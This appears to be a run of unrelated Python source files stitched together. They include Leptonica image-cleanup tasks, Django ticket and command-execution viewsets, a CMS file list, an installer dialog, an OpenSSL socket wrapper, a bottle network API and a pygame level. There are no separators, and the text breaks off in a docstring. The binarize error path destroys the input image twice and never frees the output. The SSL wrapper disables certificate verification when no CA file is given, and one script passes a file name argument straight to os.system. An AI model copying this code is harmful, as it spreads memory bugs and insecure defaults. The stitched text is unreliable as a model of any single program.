    if lept.pixGetDepth(pix) != 8:
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Input image is not grayscale')
    if lept.pixSauvolaBinarize(pix, whsize, ctypes.c_float(factor), 0, None,
                               None, None, ctypes.byref(opix)):
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Binarization failed for unknown '
                                       'reason.')
    if lept.pixWriteImpliedFormat(output_path.encode('utf-8'), opix, 100, 0):
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Writing binarized PIX failed')
    lept.pixDestroy(ctypes.byref(opix))
    lept.pixDestroy(ctypes.byref(pix))


@app.task(base=NidabaTask, name=u'nidaba.img.dewarp')
def dewarp(doc, method=u'dewarp'):
    """
    Removes perspective distortion (as commonly exhibited by overhead scans)
    from an 1bpp input image.

    Args:
        doc (unicode, unicode): The input document tuple.
        method (unicode): The suffix string appended to all output files.

    Returns:
        (unicode, unicode): Storage tuple of the output file
    """
    input_path = storage.get_abs_path(*doc)
    output_path = storage.insert_suffix(input_path, method)
    lept_dewarp(input_path, output_path)
    return storage.get_storage_path(output_path)


def lept_dewarp(image_path, output_path):
    """
    Removes perspective distortion from an 1bpp input image.

    Args:
        image_path (unicode): Path to the input image
        output_path (unicode): Path to the output image

    Raises:
        NidabaLeptonicaException if one of leptonica's functions failed.
    """
    try:
        lept = ctypes.cdll.LoadLibrary(leptlib)
    except OSError as e:
        raise NidabaLeptonicaException('Loading leptonica failed: ' +
                                       e.message)
    pix = ctypes.c_void_p(lept.pixRead(image_path.encode('utf-8')))
    opix = ctypes.c_void_p()
    ret = lept.dewarpSinglePage(pix, 0, 1, 1, ctypes.byref(opix), None, 0)
    if ret == 1 or ret is None:
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Dewarping failed for unknown reason.')
    if lept.pixWriteImpliedFormat(output_path.encode('utf-8'), opix, 100, 0):
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Writing dewarped PIX failed')
    lept.pixDestroy(ctypes.byref(pix))
    lept.pixDestroy(ctypes.byref(opix))


@app.task(base=NidabaTask, name=u'nidaba.img.deskew')
def deskew(doc, method=u'deskew'):
    """
    Removes skew (rotational distortion) from an 1bpp input image.

    Args:
        doc (unicode, unicode): The input document tuple.
        method (unicode): The suffix string appended to all output files.

    Returns:
        (unicode, unicode): Storage tuple of the output file
    """
    input_path = storage.get_abs_path(*doc)
    output_path = storage.insert_suffix(input_path, method)
    lept_deskew(input_path, output_path)
    return storage.get_storage_path(output_path)


def lept_deskew(image_path, output_path):
    """
    Removes skew (rotational distortion from an 1bpp input image.

    Args:
        image_path (unicode): Input image
        output_path (unicode): Path to the output document

    Raises:
        NidabaLeptonicaException if one of leptonica's functions failed.
    """
    try:
        lept = ctypes.cdll.LoadLibrary(leptlib)
    except OSError as e:
        raise NidabaLeptonicaException('Loading leptonica failed: ' +
                                       e.message)
    pix = ctypes.c_void_p(lept.pixRead(image_path.encode('utf-8')))
    opix = ctypes.c_void_p(lept.pixFindSkewAndDeskew(pix, 4, None, None))
    if opix is None:
        lept.pixDestroy(ctypes.byref(pix))
        raise NidabaLeptonicaException('Deskewing failed for unknown reason.')
    if lept.pixWriteImpliedFormat(output_path.encode('utf-8'), opix, 100, 0):
        lept.pixDestroy(ctypes.byref(pix))
        lept.pixDestroy(ctypes.byref(opix))
        raise NidabaLeptonicaException('Writing deskewed PIX failed')
    lept.pixDestroy(ctypes.byref(pix))
    lept.pixDestroy(ctypes.byref(opix))

# -*- coding: utf-8 -*-
#

from rest_framework import viewsets
from rest_framework.decorators import action
from rest_framework.exceptions import MethodNotAllowed
from rest_framework.response import Response

from common.const.http import POST, PUT
from common.mixins.api import CommonApiMixin
from common.permissions import IsValidUser, IsOrgAdmin

from tickets import serializers
from tickets.models import Ticket
from tickets.permissions.ticket import IsAssignee, IsAssigneeOrApplicant, NotClosed


__all__ = ['TicketViewSet']


class TicketViewSet(CommonApiMixin, viewsets.ModelViewSet):
    permission_classes = (IsValidUser,)
    serializer_class = serializers.TicketDisplaySerializer
    serializer_classes = {
        'open': serializers.TicketApplySerializer,
        'approve': serializers.TicketApproveSerializer,
    }
    filterset_fields = [
        'id', 'title', 'type', 'action', 'status', 'applicant', 'applicant_display', 'processor',
        'processor_display', 'assignees__id'
    ]
    search_fields = [
        'title', 'action', 'type', 'status', 'applicant_display', 'processor_display'
    ]

    def create(self, request, *args, **kwargs):
        raise MethodNotAllowed(self.action)

    def update(self, request, *args, **kwargs):
        raise MethodNotAllowed(self.action)

    def destroy(self, request, *args, **kwargs):
        raise MethodNotAllowed(self.action)

    def get_queryset(self):
        queryset = Ticket.get_user_related_tickets(self.request.user)
        return queryset

    def perform_create(self, serializer):
        instance = serializer.save()
        instance.open(applicant=self.request.user)

    @action(detail=False, methods=[POST], permission_classes=[IsValidUser, ])
    def open(self, request, *args, **kwargs):
        return super().create(request, *args, **kwargs)

    @action(detail=True, methods=[PUT], permission_classes=[IsOrgAdmin, IsAssignee, NotClosed])
    def approve(self, request, *args, **kwargs):
        response = super().update(request, *args, **kwargs)
        instance = self.get_object()
        instance.approve(processor=self.request.user)
        return response

    @action(detail=True, methods=[PUT], permission_classes=[IsOrgAdmin, IsAssignee, NotClosed])
    def reject(self, request, *args, **kwargs):
        instance = self.get_object()
        serializer = self.get_serializer(instance)
        instance.reject(processor=request.user)
        return Response(serializer.data)

    @action(detail=True, methods=[PUT], permission_classes=[IsAssigneeOrApplicant, NotClosed])
    def close(self, request, *args, **kwargs):
        instance = self.get_object()
        serializer = self.get_serializer(instance)
        instance.close(processor=request.user)
        return Response(serializer.data)

import FWCore.ParameterSet.Config as cms

maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
secFiles = cms.untracked.vstring() 
source = cms.Source ("PoolSource",fileNames = readFiles, secondaryFileNames = secFiles)
readFiles.extend( [
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/0A2744F9-FA05-E411-BD0C-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/0E936434-FD05-E411-81BF-F4CE46B27A1A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/32E07232-FD05-E411-897C-00259073E522.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/3CE2B535-FB05-E411-919A-20CF307C98DC.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/48093276-FC05-E411-9EEE-001F296564C6.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/50B66FF3-FA05-E411-A937-001F296564C6.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/544B2DF7-FA05-E411-B91F-001F2965F296.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/54DB2FF7-FE05-E411-824B-00259073E522.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/56D1BC32-FD05-E411-A512-20CF3027A5EB.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/5AD70432-FC05-E411-906C-20CF3027A5CD.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/5C4FBFF4-FA05-E411-9767-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/5CF748F8-FC05-E411-814B-20CF3027A5A2.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/7806E24D-FC05-E411-8922-001F2965F296.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/7C16B231-FD05-E411-8E00-20CF3027A5EB.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/802452C1-FC05-E411-A969-00221983E092.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8217E3BD-FC05-E411-B8C2-0025907277CE.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8676BEF4-FA05-E411-B26A-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8C1741F3-FA05-E411-B5B5-20CF3027A582.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/8C915AB8-FC05-E411-9EAF-F4CE46B27A1A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/AA0FCBB0-FC05-E411-898D-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/B49383BA-FC05-E411-9914-F4CE46B27A1A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/B6DAEFDD-FB05-E411-9851-20CF3027A5CD.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/C6F5C44F-FD05-E411-B86F-D48564592B02.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/C83B6B6C-FC05-E411-BAFD-D48564599CAA.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/CEF64C64-FD05-E411-A799-001F2965648A.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/D6C305FC-FA05-E411-9AF5-00259073E522.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/DE0FC6A4-FC05-E411-A2F9-00259073E36C.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/E2D5AD33-FD05-E411-868A-D48564594F36.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/E63BCC43-FB05-E411-834E-D48564599CEE.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/EAD01F32-FD05-E411-91E4-20CF3027A5F4.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/F0A18D25-FC05-E411-8DFC-20CF3027A582.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/F0B8E6B6-FA05-E411-9DAE-20CF3027A5CD.root',
       '/store/mc/Spring14miniaod/QCD_Pt-80to120_MuEnrichedPt5_Tune4C_13TeV_pythia8/MINIAODSIM/PU20bx25_POSTLS170_V5-v1/00000/F23A21C3-FD05-E411-9E29-A4BADB3D00FF.root' ] );


secFiles.extend( [
               ] )


#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <katzj@redhat.com>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_

from bootlocwidget import BootloaderLocationWidget

class AdvancedBootloaderWindow(InstallWindow):
    windowTitle = N_("Advanced Boot Loader Configuration")

    def __init__(self, ics):
        InstallWindow.__init__(self, ics)
        self.parent = ics.getICW().window


    def getPrev(self):
        pass


    def getNext(self):
        # forcing lba32 can be a bad idea.. make sure they really want to
        if (self.forceLBA.get_active() and not self.bl.forceLBA32):
            rc = self.intf.messageWindow(_("Warning"),
                    _("Forcing the use of LBA32 for your bootloader when "
                      "not supported by the BIOS can cause your machine "
                      "to be unable to boot.\n\n"
                      "Would you like to continue and force LBA32 mode?"),
                                         type = "custom",
                                         custom_buttons = [_("Cancel"),
                                                           _("Force LBA32")])
            if rc != 1:
                raise gui.StayOnScreen

        # set forcelba
        self.bl.setForceLBA(self.forceLBA.get_active())
        # set kernel args
        self.bl.args.set(self.appendEntry.get_text())

        # set the boot device
        self.bl.setDevice(self.blloc.getBootDevice())

        # set the drive order
        self.bl.drivelist = self.blloc.getDriveOrder()


    # set up the vbox with force lba32 and kernel append
    def setupOptionsVbox(self):
        self.options_vbox = gtk.VBox(False, 5)
        self.options_vbox.set_border_width(5)
        
        self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
        self.options_vbox.pack_start(self.forceLBA, False)
        self.forceLBA.set_active(self.bl.forceLBA32)

        label = gui.WrappingLabel(_("If you wish to add default options to the "
			    "boot command, enter them into "
			    "the 'General kernel parameters' field."))
	label.set_alignment(0.0, 0.0)
        self.options_vbox.pack_start(label, False)

        label = gui.MnemonicLabel(_("_General kernel parameters"))
        self.appendEntry = gtk.Entry()
        label.set_mnemonic_widget(self.appendEntry)
        args = self.bl.args.get()
        if args:
            self.appendEntry.set_text(args)
        box = gtk.HBox(False, 0)
        box.pack_start(label)
        box.pack_start(self.appendEntry)
	al = gtk.Alignment(0.0, 0.0)
	al.add(box)
        self.options_vbox.pack_start(al, False)


    def getScreen(self, anaconda):
        self.dispatch = anaconda.dispatch
        self.bl = anaconda.id.bootloader
        self.intf = anaconda.intf

        thebox = gtk.VBox (False, 10)

        # boot loader location bits (mbr vs boot, drive order)
        self.blloc = BootloaderLocationWidget(anaconda, self.parent)
        thebox.pack_start(self.blloc.getWidget(), False)

        thebox.pack_start (gtk.HSeparator(), False)

        # some optional things
        self.setupOptionsVbox()
        thebox.pack_start(self.options_vbox, False)


        return thebox

#!/usr/bin/env python
# **********************************************************************
#
# Copyright (c) 2003-2011 ZeroC, Inc. All rights reserved.
#
# This copy of Ice is licensed to you under the terms described in the
# ICE_LICENSE file included in this distribution.
#
# **********************************************************************

import os, sys

path = [ ".", "..", "../..", "../../..", "../../../.." ]
head = os.path.dirname(sys.argv[0])
if len(head) > 0:
    path = [os.path.join(head, p) for p in path]
path = [os.path.abspath(p) for p in path if os.path.exists(os.path.join(p, "scripts", "TestUtil.py")) ]
if len(path) == 0:
    raise "can't find toplevel directory!"
sys.path.append(os.path.join(path[0]))
from scripts import *

dbdir = os.path.join(os.getcwd(), "db")
TestUtil.cleanDbDir(dbdir)

client = os.path.join(os.getcwd(), "client")

if TestUtil.appverifier:
    TestUtil.setAppVerifierSettings([client])

clientProc = TestUtil.startClient(client, ' --Freeze.Warn.Rollback=0 "%s"' % os.getcwd())
clientProc.waitTestSuccess()

if TestUtil.appverifier:
    TestUtil.appVerifierAfterTestEnd([client])

#!/usr/bin/python

import os
import sys
import re

# file name unified by the following rule:
# 1. always save the osm under ../osmFiles directory
# 2. the result automatically generate to ../trajectorySets
# 3.1. change variable "osmName", or
# 3.2. use command argument to specify osm file name
# 4. this script generates a set of paths, each includes a series of of points,
#    and save in originOfLife folder for further parsing.

# also, please scroll down the very bottom to see what's the next step

osmName = 'San_Jose_20x20.osm'   # sample: 'ucla.osm'
#osmName = 'Los_Angeles_20x20.osm'   # sample: 'ucla.osm'
#osmName = 'ucla_5x5.osm'   # sample: 'ucla.osm'

optionAllowLoop = False   # most of the cases are building bounding boxes



# support system parameters
if len(sys.argv) >= 2:
	osmName = sys.argv[1]
if len(sys.argv) >= 3:
	optionAllowLoop = (sys.argv[2] == '1')

inFile = '../../../Data/osmFiles/' + osmName
if len(osmName.split('.')) == 1:
    osmNameWoExt = osmName
else:
    osmNameWoExt = osmName[:-(1+len(osmName.split('.')[-1]))]
outRootDir = '../../../Data/trajectorySets/'
outFile = outRootDir + osmNameWoExt + '.tfix'


print('input file = ' + inFile)
print('output file = ' + outFile)
print('')

f = open('/tmp/in', 'w')
f.write('<in>' + inFile + '</in>');
f.close()

# the following command can be slow. a 3x3 mile^2 area takes 53 seconds to generate the result.
xmlWayDetail = outRootDir + 'originOfLife/' + osmNameWoExt + '.xml'
cmd = 'basex findWayTrajectory.xq > ' + xmlWayDetail
print('CMD: ' + cmd)
if os.path.isfile(xmlWayDetail):
    print('File existed. Skip.')
else:
    os.system(cmd)

# the next step should be executing the python3 ../makeElevSegMap.py with the input
# parameter outFile, but because of the relative folder path issue, integrating
# makeElevSegMap.py into this code needs to make big changes. So at this stage,
# we still stay on manually executing that script.


# OpenSSL is more stable then ssl
# but OpenSSL is different then ssl, so need a wrapper
import sys
import os


import OpenSSL
SSLError = OpenSSL.SSL.WantReadError

import select
import time
import socket
import logging

ssl_version = ''

class SSLConnection(object):
    """OpenSSL Connection Wrapper"""

    def __init__(self, context, sock):
        self._context = context
        self._sock = sock
        self._connection = OpenSSL.SSL.Connection(context, sock)
        self._makefile_refs = 0

    def __getattr__(self, attr):
        if attr not in ('_context', '_sock', '_connection', '_makefile_refs'):
            return getattr(self._connection, attr)

    def __iowait(self, io_func, *args, **kwargs):
        timeout = self._sock.gettimeout() or 0.1
        fd = self._sock.fileno()
        time_start = time.time()
        while True:
            try:
                return io_func(*args, **kwargs)
            except (OpenSSL.SSL.WantReadError, OpenSSL.SSL.WantX509LookupError):
                sys.exc_clear()
                _, _, errors = select.select([fd], [], [fd], timeout)
                if errors:
                    break
                time_now = time.time()
                if time_now - time_start > timeout:
                    break
            except OpenSSL.SSL.WantWriteError:
                sys.exc_clear()
                _, _, errors = select.select([], [fd], [fd], timeout)
                if errors:
                    break
                time_now = time.time()
                if time_now - time_start > timeout:
                    break

    def accept(self):
        sock, addr = self._sock.accept()
        client = OpenSSL.SSL.Connection(sock._context, sock)
        return client, addr

    def do_handshake(self):
        self.__iowait(self._connection.do_handshake)

    def connect(self, *args, **kwargs):
        return self.__iowait(self._connection.connect, *args, **kwargs)

    def __send(self, data, flags=0):
        try:
            return self.__iowait(self._connection.send, data, flags)
        except OpenSSL.SSL.SysCallError as e:
            if e[0] == -1 and not data:
                # errors when writing empty strings are expected and can be ignored
                return 0
            raise

    def __send_memoryview(self, data, flags=0):
        if hasattr(data, 'tobytes'):
            data = data.tobytes()
        return self.__send(data, flags)

    send = __send if sys.version_info >= (2, 7, 5) else __send_memoryview

    def recv(self, bufsiz, flags=0):
        pending = self._connection.pending()
        if pending:
            return self._connection.recv(min(pending, bufsiz))
        try:
            return self.__iowait(self._connection.recv, bufsiz, flags)
        except OpenSSL.SSL.ZeroReturnError:
            return ''
        except OpenSSL.SSL.SysCallError as e:
            if e[0] == -1 and 'Unexpected EOF' in e[1]:
                # errors when reading empty strings are expected and can be ignored
                return ''
            raise

    def read(self, bufsiz, flags=0):
        return self.recv(bufsiz, flags)

    def write(self, buf, flags=0):
        return self.sendall(buf, flags)

    def close(self):
        if self._makefile_refs < 1:
            self._connection = None
            if self._sock:
                socket.socket.close(self._sock)
        else:
            self._makefile_refs -= 1

    def makefile(self, mode='r', bufsize=-1):
        self._makefile_refs += 1
        return socket._fileobject(self, mode, bufsize, close=True)

    @staticmethod
    def context_builder(ca_certs=None, cipher_suites=('ALL:!RC4-SHA:!ECDHE-RSA-RC4-SHA:!ECDHE-RSA-AES128-GCM-SHA256:!AES128-GCM-SHA256',)):
        # 'ALL', '!aNULL', '!eNULL'
        global  ssl_version

        if not ssl_version:
            if hasattr(OpenSSL.SSL, "TLSv1_2_METHOD"):
                ssl_version = "TLSv1_2"
            elif hasattr(OpenSSL.SSL, "TLSv1_1_METHOD"):
                ssl_version = "TLSv1_1"
            elif hasattr(OpenSSL.SSL, "TLSv1_METHOD"):
                ssl_version = "TLSv1"
            else:
                ssl_version = "SSLv23"

            if sys.platform == "darwin":
                ssl_version = "TLSv1"

            logging.info("SSL use version:%s", ssl_version)

        protocol_version = getattr(OpenSSL.SSL, '%s_METHOD' % ssl_version)
        ssl_context = OpenSSL.SSL.Context(protocol_version)
        if ca_certs:
            ssl_context.load_verify_locations(os.path.abspath(ca_certs))
            ssl_context.set_verify(OpenSSL.SSL.VERIFY_PEER, lambda c, x, e, d, ok: ok)
        else:
            ssl_context.set_verify(OpenSSL.SSL.VERIFY_NONE, lambda c, x, e, d, ok: ok)
        ssl_context.set_cipher_list(':'.join(cipher_suites))
        return ssl_context


import json
import bottle
from pyrouted.util import make_spec


def route(method, path):
    def decorator(f):
        f.http_route = path
        f.http_method = method
        return f
    return decorator


class APIv1(object):

    prefix = '/v1'

    def __init__(self, ndb, config):
        self.ndb = ndb
        self.config = config

    @route('GET', '/sources')
    def sources_list(self, mode='short'):
        ret = {}
        mode = bottle.request.query.mode or mode
        for name, spec in self.ndb.sources.items():
            ret[name] = {'class': spec.nl.__class__.__name__,
                         'status': spec.status}
            if mode == 'full':
                ret[name]['config'] = spec.nl_kwarg
        return bottle.template('{{!ret}}', ret=json.dumps(ret))

    @route('PUT', '/sources')
    def sources_restart(self):
        node = bottle.request.body.getvalue().decode('utf-8')
        self.ndb.sources[node].start()

    @route('POST', '/sources')
    def sources_add(self):
        data = bottle.request.body.getvalue().decode('utf-8')
        node, spec = make_spec(data, self.config)
        self.config['sources'].append(node)
        self.ndb.connect_source(node, spec)

    @route('DELETE', '/sources')
    def sources_del(self):
        node = bottle.request.body.getvalue().decode('utf-8')
        self.config['sources'].remove(node)
        self.ndb.disconnect_source(node)

    @route('GET', '/config')
    def config_get(self):
        return bottle.template('{{!ret}}',
                               ret=json.dumps(self.config))

    @route('PUT', '/config')
    def config_dump(self):
        path = bottle.request.body.getvalue().decode('utf-8')
        self.config.dump(path)

    @route('GET', '/<name:re:(%s|%s|%s|%s|%s|%s)>' % ('interfaces',
                                                      'addresses',
                                                      'routes',
                                                      'neighbours',
                                                      'vlans',
                                                      'bridges'))
    def view(self, name):
        ret = []
        obj = getattr(self.ndb, name)
        for line in obj.dump():
            ret.append(line)
        return bottle.template('{{!ret}}', ret=json.dumps(ret))

    @route('GET', '/query/<name:re:(%s|%s|%s|%s)>' % ('nodes',
                                                      'p2p_edges',
                                                      'l2_edges',
                                                      'l3_edges'))
    def query(self, name):
        ret = []
        obj = getattr(self.ndb.query, name)
        for line in obj():
            ret.append(line)
        return bottle.template('{{!ret}}', ret=json.dumps(ret))

import sys,os
#sys.path.append(os.path.join(os.path.dirname(__file__), '../../..'))
#from ethosgame.ethos.level import Level
from ..level import Level
#from ethosgame.ethos.gameobject import GameObject
from ..gameobject import GameObject
#from ethosgame.ethos.drawnobject import DrawnObject
from ..drawnobject import DrawnObject
import pygame
from pygame.locals import *
from pygame import Color, image, font, sprite

class Level0(Level):

    def __init__(self):
        super(Level0, self).__init__()

        self.activeSprites = sprite.RenderClear()
        self.drawnSprites = []
        self.npc = GameObject(image.load('User.png'), 100,50)
        self.activeSprites.add(self.npc)
        
        self.block1 = GameObject(image.load('platform.png'), 100, 400)
        self.activeSprites.add(self.block1);

        self.mousex = 0
        self.mousey = 0

	#The highest height our npc
	#can climb. If a the dY with a
	#point is higher than this, the
	#npc will just fall to his death
	self.MAX_HILL_HEIGHT = 3

	self.toDrawRectTopLeft = (0,0)
	self.toDrawRectBottomRight = (0,0)

        self.drawing = False

        self.pts = []

        print "Level 0 initialized."

    def update(self, dT):
        #print "Running level0"
        #Character info
        for gobject in self.activeSprites:
            if gobject is not self.npc:
                if not gobject.rect.colliderect(self.npc.rect):
                    #if self.npc.vy < 0.3 and (gobject.rect.y >= self.npc.rect.y + self.npc.rect.height):
                    if self.npc.vy < 0.3:
                        self.npc.vy += 0.1 
                else:
                    self.npc.vy = 0

            gobject.update(dT)

	collidingPoints = []
        for drawnstuff in self.drawnSprites:
	    for point in drawnstuff.pts:
	        x = self.npc.rect.collidepoint(point)
	        if x:
                    collidingPoints.append(point)
        if(len(collidingPoints) > 0):
            self.npc.processPointCollision(collidingPoints)



    def processKeyDown(self,key):
        print "You hit the key " + str(key) + "!"
        if key == pygame.K_RIGHT:
            self.npc.vx = 0.1

    def processMouseMotion(self,pos):
        #print "Your mouse is at " + str(pos[0]) + " " + str(pos[1])
        self.mousex = pos[0]
        self.mousey = pos[1]
        if self.drawing and len(self.pts) < 100:
            self.pts.append( pos )

    def processMouseButtonDown(self, pos):
        print "Ya clicked at " + str(pos[0]) + " " + str(pos[1]) + " ya goof!"
        self.drawing = True
	
	self.toDrawRectTopLeft = (pos[0],pos[1])
        if len(self.pts) > 0:
            self.pts = []


    def processMouseButtonUp(self, pos):
        print "Ya let go"
        if self.drawing is True:
            self.drawing = False
            self.drawnSprites.append ( DrawnObject(self.pts) )
	    self.toDrawRectBottomRight = (pos[0], pos[1])



from django.conf.urls import url

from . import views

urlpatterns = [
	url(r'^$', views.map, name='map'),
	url(r'^mapSim', views.mapSim, name='mapSim'),
	url(r'^api/getPos', views.getPos, name='getPos'),
	url(r'^api/getProjAndPos', views.getProjAndPos, name='getProjAndPos'),
]

# -*- coding: utf-8 -*-
#
from rest_framework import viewsets
from rest_framework.exceptions import ValidationError
from django.db import transaction
from django.utils.translation import ugettext as _
from django.conf import settings

from orgs.mixins.api import RootOrgViewMixin
from common.permissions import IsValidUser
from perms.utils import AssetPermissionUtil
from ..models import CommandExecution
from ..serializers import CommandExecutionSerializer
from ..tasks import run_command_execution


class CommandExecutionViewSet(RootOrgViewMixin, viewsets.ModelViewSet):
    serializer_class = CommandExecutionSerializer
    permission_classes = (IsValidUser,)

    def get_queryset(self):
        return CommandExecution.objects.filter(
            user_id=str(self.request.user.id)
        )

    def check_hosts(self, serializer):
        data = serializer.validated_data
        assets = data["hosts"]
        system_user = data["run_as"]
        util = AssetPermissionUtil(self.request.user)
        util.filter_permissions(system_users=system_user.id)
        permed_assets = util.get_assets().filter(id__in=[a.id for a in assets])
        invalid_assets = set(assets) - set(permed_assets)
        if invalid_assets:
            msg = _("Not has host {} permission").format(
                [str(a.id) for a in invalid_assets]
            )
            raise ValidationError({"hosts": msg})

    def check_permissions(self, request):
        if not settings.SECURITY_COMMAND_EXECUTION and request.user.is_common_user:
            return self.permission_denied(request, "Command execution disabled")
        return super().check_permissions(request)

    def perform_create(self, serializer):
        self.check_hosts(serializer)
        instance = serializer.save()
        instance.user = self.request.user
        instance.save()
        cols = self.request.query_params.get("cols", '80')
        rows = self.request.query_params.get("rows", '24')
        transaction.on_commit(lambda: run_command_execution.apply_async(
            args=(instance.id,), kwargs={"cols": cols, "rows": rows},
            task_id=str(instance.id)
        ))

# -*- coding: utf-8 -*-
"""
Created on Tue May 28 12:20:59 2013

=== MAYAXES (v1.1) ===
Generates a set of MayaVI axes using the mayavi.mlab.axes() object with a 
white background, small black text and a centred title.  Designed to better 
mimic MATLAB style plots.  

Unspecified arguments will be set to default values when mayaxes is called 
(note that default settings are configured for a figure measuring 1024 x 768 
pixels and may not display correctly on plots that are significantly larger 
or smaller). 

=== Inputs ===
'title'         Figure title text (default = 'VOID') 
'xlabel'        X axis label text (default = 'X')
'ylabel'        Y axis label text (default = 'Y')
